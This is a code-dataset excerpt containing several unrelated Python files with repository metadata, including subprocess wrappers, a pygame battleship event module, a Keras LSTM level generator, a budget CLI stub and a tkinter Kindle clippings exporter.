if isinstance(args, tuple) and (args[0][2] == "pip"):
raise RuntimeError( \
"Full traceback: {}\n Pip install failed for package: {} \
\n Output from execution of subprocess: {}" \
.format(traceback.format_exc(), args[0][6], error. output))
else:
raise RuntimeError("Full trace: {}\
\n Output of the failed child process: {} " \
.format(traceback.format_exc(), error.output))
return out
def check_call(*args, **kwargs):
if force_shell:
kwargs['shell'] = True
try:
out = subprocess.check_call(*args, **kwargs)
except OSError:
raise RuntimeError("Executable {} not found".format(args[0]))
except subprocess.CalledProcessError as error:
if isinstance(args, tuple) and (args[0][2] == "pip"):
raise RuntimeError( \
"Full traceback: {} \n Pip install failed for package: {} \
\n Output from execution of subprocess: {}" \
.format(traceback.format_exc(), args[0][6], error.output))
else:
raise RuntimeError("Full trace: {} \
\n Output of the failed child process: {}" \
.format(traceback.format_exc(), error.output))
return out
def check_output(*args, **kwargs):
if force_shell:
kwargs['shell'] = True
try:
out = subprocess.check_output(*args, **kwargs)
except OSError:
raise RuntimeError("Executable {} not found".format(args[0]))
except subprocess.CalledProcessError as error:
if isinstance(args, tuple) and (args[0][2] == "pip"):
raise RuntimeError( \
"Full traceback: {} \n Pip install failed for package: {} \
\n Output from execution of subprocess: {}" \
.format(traceback.format_exc(), args[0][6], error.output))
else:
raise RuntimeError("Full trace: {}, \
output of the failed child process {} "\
.format(traceback.format_exc(), error.output))
return out
def Popen(*args, **kwargs):
if force_shell:
kwargs['shell'] = True
return subprocess.Popen(*args, **kwargs)
| 2,275 | 0 | 100 |
fb2e165b9cab12205cb49a14697d29f1f446e88a | 636 | py | Python | bship/events.py | UTDS16/battleship | 0244dd350fd628baf0928762ea49352ab418660c | [
"MIT"
] | null | null | null | bship/events.py | UTDS16/battleship | 0244dd350fd628baf0928762ea49352ab418660c | [
"MIT"
] | 6 | 2016-12-08T17:33:32.000Z | 2016-12-15T02:24:42.000Z | bship/events.py | UTDS16/battleship | 0244dd350fd628baf0928762ea49352ab418660c | [
"MIT"
] | null | null | null | import pygame
# It seems that up to USEREVENT + 3 are already taken.
# Anyway, an event for server announces.
# It's about time for the server to advertise its presence.
E_ANNOUNCE = pygame.USEREVENT + 4
# A state change has occurred.
E_STATE = pygame.USEREVENT + 5
# Player in the lobby.
S_LOBBY = 0
# Player creating a new server.
S_CREATE = 1
# Player joining an existing game.
S_JOIN = 2
# Player in the game.
S_GAME = 3
# Player in the game, placing ships.
S_GAME_PLACING = 4
# Player in the game, waiting for their turn.
S_GAME_WAITING = 5
# Player's turn, cherry-picking the tile to bomb.
S_GAME_SHOOTING = 6
S_GAME_LAST = 6
| 23.555556 | 59 | 0.738994 | import pygame
# It seems that up to USEREVENT + 3 are already taken.
# Anyway, an event for server announces.
# It's about time for the server to advertise its presence.
E_ANNOUNCE = pygame.USEREVENT + 4
# A state change has occurred.
E_STATE = pygame.USEREVENT + 5
# Player in the lobby.
S_LOBBY = 0
# Player creating a new server.
S_CREATE = 1
# Player joining an existing game.
S_JOIN = 2
# Player in the game.
S_GAME = 3
# Player in the game, placing ships.
S_GAME_PLACING = 4
# Player in the game, waiting for their turn.
S_GAME_WAITING = 5
# Player's turn, cherry-picking the tile to bomb.
S_GAME_SHOOTING = 6
S_GAME_LAST = 6
| 0 | 0 | 0 |
0918669d246dee92735957bcb29fa3a26b3a47f8 | 4,036 | py | Python | LSTM/code/model.py | ayush1997/DLG | 99b030eb68a2f5e7f30b0213249eb03d11bcceef | [
"Apache-2.0"
] | null | null | null | LSTM/code/model.py | ayush1997/DLG | 99b030eb68a2f5e7f30b0213249eb03d11bcceef | [
"Apache-2.0"
] | null | null | null | LSTM/code/model.py | ayush1997/DLG | 99b030eb68a2f5e7f30b0213249eb03d11bcceef | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
import os
if __name__ == "__main__":
all_folders = "../levels_transposed/"
result_path = "../levels_prediction_textfiles/"
original_level_path = all_folders + sys.argv[1]
try:
text = open(original_level_path).read().lower()
except UnicodeDecodeError:
import codecs
text = codecs.open(original_level_path, encoding='utf-8').read().lower()
chars = set(text)
words = set(open(original_level_path).read().lower().split())
word_indices = dict((c, i) for i, c in enumerate(words))
indices_word = dict((i, c) for i, c in enumerate(words))
maxlen = 30
step = 3
print("maxlen:",maxlen,"step:", step)
sentences = []
next_words = []
next_words= []
sentences1 = []
list_words = []
sentences2=[]
list_words=text.lower().split()
for i in range(0,len(list_words)-maxlen, step):
sentences2 = ' '.join(list_words[i: i + maxlen])
sentences.append(sentences2)
next_words.append((list_words[i + maxlen]))
# print('Vectorization...')
X = np.zeros((len(sentences), maxlen, len(words)), dtype=np.bool)
y = np.zeros((len(sentences), len(words)), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, word in enumerate(sentence.split()):
#print(i,t,word)
X[i, t, word_indices[word]] = 1
y[i, word_indices[next_words[i]]] = 1
#build the model: 2 stacked LSTM
# print('Build model...')
model = Sequential()
model.add(LSTM(512, return_sequences=True, input_shape=(maxlen, len(words))))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=False))
model.add(Dropout(0.2))
model.add(Dense(len(words)))
#model.add(Dense(1000))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
if os.original_level_path.isfile('GoTweights'):
model.load_weights('GoTweights')
# train the model, output generated text after each iteration
for iteration in range(1, 300):
print()
print('-' * 50)
print('Iteration', iteration)
model.fit(X, y, batch_size=64, nb_epoch=2)
#model.save_weights('GoTweights',overwrite=True)
start_index = random.randint(0, len(list_words) - maxlen - 1)
predictionText = open(result_path + os.original_level_path.splitext(sys.argv[1])[0] + "_new_"+str(iteration)+".txt", "w+")
loop_range = [1.0,1.2]
for diversity in loop_range:
print()
print('----- diversity:', diversity)
generated = ''
sentence = list_words[start_index: start_index + maxlen]
generated += ' '.join(sentence)
print('----- Generating with seed: "' , sentence , '"')
print()
sys.stdout.write(generated)
print()
for i in range(1024):
x = np.zeros((1, maxlen, len(words)))
for t, word in enumerate(sentence):
x[0, t, word_indices[word]] = 1.
preds = model.predict(x, verbose=0)[0]
next_index = sample(preds, diversity)
next_word = indices_word[next_index]
generated += next_word
predictionText.write(next_word+"\n")
del sentence[0]
sentence.append(next_word)
sys.stdout.write(' ')
sys.stdout.write(next_word)
sys.stdout.flush()
print()
| 33.081967 | 131 | 0.601338 | from __future__ import print_function
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
import os
if __name__ == "__main__":
all_folders = "../levels_transposed/"
result_path = "../levels_prediction_textfiles/"
original_level_path = all_folders + sys.argv[1]
try:
text = open(original_level_path).read().lower()
except UnicodeDecodeError:
import codecs
text = codecs.open(original_level_path, encoding='utf-8').read().lower()
chars = set(text)
words = set(open(original_level_path).read().lower().split())
word_indices = dict((c, i) for i, c in enumerate(words))
indices_word = dict((i, c) for i, c in enumerate(words))
maxlen = 30
step = 3
print("maxlen:",maxlen,"step:", step)
sentences = []
next_words = []
next_words= []
sentences1 = []
list_words = []
sentences2=[]
list_words=text.lower().split()
for i in range(0,len(list_words)-maxlen, step):
sentences2 = ' '.join(list_words[i: i + maxlen])
sentences.append(sentences2)
next_words.append((list_words[i + maxlen]))
# print('Vectorization...')
X = np.zeros((len(sentences), maxlen, len(words)), dtype=np.bool)
y = np.zeros((len(sentences), len(words)), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, word in enumerate(sentence.split()):
#print(i,t,word)
X[i, t, word_indices[word]] = 1
y[i, word_indices[next_words[i]]] = 1
#build the model: 2 stacked LSTM
# print('Build model...')
model = Sequential()
model.add(LSTM(512, return_sequences=True, input_shape=(maxlen, len(words))))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=False))
model.add(Dropout(0.2))
model.add(Dense(len(words)))
#model.add(Dense(1000))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
if os.original_level_path.isfile('GoTweights'):
model.load_weights('GoTweights')
def sample(a, temperature=1.0):
# helper function to sample an index from a probability array
a = np.log(a) / temperature
a = np.exp(a) / np.sum(np.exp(a))
return np.argmax(np.random.multinomial(1, a, 1))
# train the model, output generated text after each iteration
for iteration in range(1, 300):
print()
print('-' * 50)
print('Iteration', iteration)
model.fit(X, y, batch_size=64, nb_epoch=2)
#model.save_weights('GoTweights',overwrite=True)
start_index = random.randint(0, len(list_words) - maxlen - 1)
predictionText = open(result_path + os.original_level_path.splitext(sys.argv[1])[0] + "_new_"+str(iteration)+".txt", "w+")
loop_range = [1.0,1.2]
for diversity in loop_range:
print()
print('----- diversity:', diversity)
generated = ''
sentence = list_words[start_index: start_index + maxlen]
generated += ' '.join(sentence)
print('----- Generating with seed: "' , sentence , '"')
print()
sys.stdout.write(generated)
print()
for i in range(1024):
x = np.zeros((1, maxlen, len(words)))
for t, word in enumerate(sentence):
x[0, t, word_indices[word]] = 1.
preds = model.predict(x, verbose=0)[0]
next_index = sample(preds, diversity)
next_word = indices_word[next_index]
generated += next_word
predictionText.write(next_word+"\n")
del sentence[0]
sentence.append(next_word)
sys.stdout.write(' ')
sys.stdout.write(next_word)
sys.stdout.flush()
print()
| 215 | 0 | 27 |
281b2bb040823d5ed05354eed9b4ed54853060af | 691 | py | Python | abcli/__init__.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | 3 | 2019-10-19T15:07:34.000Z | 2022-01-07T01:49:24.000Z | abcli/__init__.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | null | null | null | abcli/__init__.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | 1 | 2022-03-12T03:22:29.000Z | 2022-03-12T03:22:29.000Z | # CLI
#
# Commands:
# - transactions import <json>
# - transaction show (?)
# - account show [name] [date-from] [date-to] [aggregation:week|fortnight|*month*|quarter|year]
# Shows balance, average in aggregation method, between two dates
# - account graph [name] [date-from] [date-to] [aggregation:...]
# - budget import <json>
# - budget show [name] [account]
# Shows progress & summary of a named budget
# - budget project [name] [unit] [aggregation:...]
import logging
# logging.basicConfig(format="[%(levelname)s] %(message)s")
import coloredlogs
# TODO: maybe load format from a config file?
coloredlogs.install(fmt="%(message)s", logger=logging.getLogger())
| 36.368421 | 97 | 0.681621 | # CLI
#
# Commands:
# - transactions import <json>
# - transaction show (?)
# - account show [name] [date-from] [date-to] [aggregation:week|fortnight|*month*|quarter|year]
# Shows balance, average in aggregation method, between two dates
# - account graph [name] [date-from] [date-to] [aggregation:...]
# - budget import <json>
# - budget show [name] [account]
# Shows progress & summary of a named budget
# - budget project [name] [unit] [aggregation:...]
import logging
# logging.basicConfig(format="[%(levelname)s] %(message)s")
import coloredlogs
# TODO: maybe load format from a config file?
coloredlogs.install(fmt="%(message)s", logger=logging.getLogger())
| 0 | 0 | 0 |
07ea35374229480bf2eea63ea423ff927d92c861 | 5,564 | py | Python | application.py | naimaier/kindle-notes | 47efaf8c314211e57754db836c1c17243543cfc0 | [
"MIT"
] | null | null | null | application.py | naimaier/kindle-notes | 47efaf8c314211e57754db836c1c17243543cfc0 | [
"MIT"
] | null | null | null | application.py | naimaier/kindle-notes | 47efaf8c314211e57754db836c1c17243543cfc0 | [
"MIT"
] | null | null | null | from tkinter import *
from tkinter import ttk
from functools import partial
# Generate main window
root = Tk()
gui = Application(root)
# Necessary for winfo_width and winfo_heigh to work properly
root.update()
""" Centering the window on the screen """
# https://yagisanatode.com/2018/02/24/how-to-center-the-main-window-on-the-screen-in-tkinter-with-python-3/
# Changed winfo_reqwidth and winfo_reqheight to winfo_width and winfo_height
# Gets the requested values of the height and widht.
windowWidth = root.winfo_width()
windowHeight = root.winfo_height()
# Gets both half the screen width/height and window width/height
positionRight = int(root.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(root.winfo_screenheight()/2 - windowHeight/2)
# Positions the window in the center of the page.
root.geometry("+{}+{}".format(positionRight, positionDown))
root.mainloop() | 30.571429 | 107 | 0.614845 | from tkinter import *
from tkinter import ttk
from functools import partial
class MyClippings():
clippings = []
def append(self, element):
self.clippings.append(element)
def getBookNames(self):
distinctBookNames = set()
for clipping in self.clippings:
distinctBookNames.add(clipping['book'])
return list(distinctBookNames)
def getClippingsFromBook(self, book):
clippingsFromBook = []
for clipping in self.clippings:
if clipping['book'] == book:
clippingsFromBook.append(clipping)
return clippingsFromBook
class Application():
# list containing all the clippings
myClippings = MyClippings()
remove_duplicates = IntVar()
def __init__(self, root):
''' GUI '''
self.root = root
self.root.title("Kindle Notes Exporter")
self.root.resizable(height=False, width=False)
self.main_frame = Frame(self.root, padx=10, pady=10)
self.main_frame.pack(expand=True)
self.lbl_title = Label(master=self.main_frame,
font="Verdana 20 bold",
padx=10, pady=10,
text="Kindle Note Exporter")
self.lbl_title.pack()
""" Input Button """
self.btn_input = Button(master=self.main_frame, text="Load 'My Clippings.txt'")
self.btn_input["command"] = partial(self.load_input_file)
self.btn_input.pack()
""" Options """
self.combobox_books = ttk.Combobox(master=self.main_frame)
self.combobox_books.pack()
self.chk_remove_duplicates = Checkbutton(master=self.main_frame,
text="Remove duplicates",
variable=self.remove_duplicates)
""" Export Button """
self.btn_export = Button(master=self.main_frame, text="Export")
self.btn_export["command"] = partial(self.export)
self.btn_export.pack()
def load_input_file(self):
# open My Clippings kindle file
with open('My Clippings.txt') as file:
fileContent = file.read()
self.parseFileContent(fileContent)
self.populateComboBox()
def parseFileContent(self, fileContent):
# separate each element in the file
elements = fileContent.split('==========')
# remove last element witch is always blank
elements.pop()
# parse elements and add to my clippings variable
for element in elements:
clipping = self.parseElement(element)
if clipping is not None:
self.myClippings.append(clipping)
def parseElement(self, element):
# separate the elements of a clipping and strip the blank values
element = element.split('\n')
element = list(filter(None, element))
# if element is not a bookmark (len == 3) parse element
if len(element) == 3:
parsedElement = {}
parsedElement['book'] = element[0]
parsedElement['info'] = self.parseElementInfo(element[1])
parsedElement['content'] = element[2]
return parsedElement
# if it is a bookmark
else:
return None
def parseElementInfo(self, elementInfo):
# separate the info present in the line of text
elementInfo = elementInfo.split(' | ')
# parse according to the amount of info
parsedElementInfo = {}
if len(elementInfo) == 3:
parsedElementInfo['type'] = elementInfo[0]
parsedElementInfo['position'] = elementInfo[1]
parsedElementInfo['date'] = elementInfo[2]
else:
parsedElementInfo['type'] = elementInfo[0]
parsedElementInfo['position'] = None
parsedElementInfo['date'] = elementInfo[1]
return parsedElementInfo
def populateComboBox(self):
self.combobox_books['values'] = self.myClippings.getBookNames()
def filterClippings(self):
if self.remove_duplicates.get == 1:
self.checkDuplicates()
def checkDuplicates(self):
for clipping in self.myClippings.clippings:
if self.isDuplicate(clipping):
self.myClippings.clippings.remove(clipping)
def isDuplicate(self, input_clipping):
for clipping in self.myClippings.clippings:
if input_clipping['book'] != clipping['book']:
break
elif input_clipping['content'] in clipping['content']:
return True
return False
def export(self):
pass
# Generate main window
root = Tk()
gui = Application(root)
# Necessary for winfo_width and winfo_heigh to work properly
root.update()
""" Centering the window on the screen """
# https://yagisanatode.com/2018/02/24/how-to-center-the-main-window-on-the-screen-in-tkinter-with-python-3/
# Changed winfo_reqwidth and winfo_reqheight to winfo_width and winfo_height
# Gets the requested values of the height and widht.
windowWidth = root.winfo_width()
windowHeight = root.winfo_height()
# Gets both half the screen width/height and window width/height
positionRight = int(root.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(root.winfo_screenheight()/2 - windowHeight/2)
# Positions the window in the center of the page.
root.geometry("+{}+{}".format(positionRight, positionDown))
root.mainloop() | 2,853 | 1,774 | 46 |